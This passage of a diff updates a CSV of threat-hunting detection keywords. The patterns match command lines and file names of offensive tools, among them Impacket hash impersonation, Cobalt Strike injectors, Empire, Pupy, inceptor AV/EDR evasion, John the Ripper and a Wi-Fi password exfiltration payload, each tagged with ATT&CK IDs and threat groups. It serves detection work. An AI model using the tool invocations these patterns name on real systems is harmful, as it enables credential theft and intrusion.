T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "* -i snmp-ips.txt -c community.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "* iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -956,63 +956,63 @@ "* imap-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* impacket *","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"* impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* impacket*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"* impacket.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* --impersonate Administrator -shell *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -impersonate* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -ImpersonateUser *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* impacket.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --impersonate Administrator -shell *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -impersonate* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -ImpersonateUser *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence 
- WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* import Exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"* -ImportDllPathPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ImportDllPathPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -inc -u=0 *.pwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* -inc=digits *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* inceptor.*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* inceptor.spec*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 
- T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -inc -u=0 *.pwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -inc=digits *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* inceptor.*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.spec*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* --includeModules amass*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"* -InFile Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* -InFile Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "* informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Injector NtMapViewOfSection*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" "* -Injector VirtualAllocEx*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"* --input 10m_usernames.txt*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"* -InputPath .\TrustedForests.txt*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - 
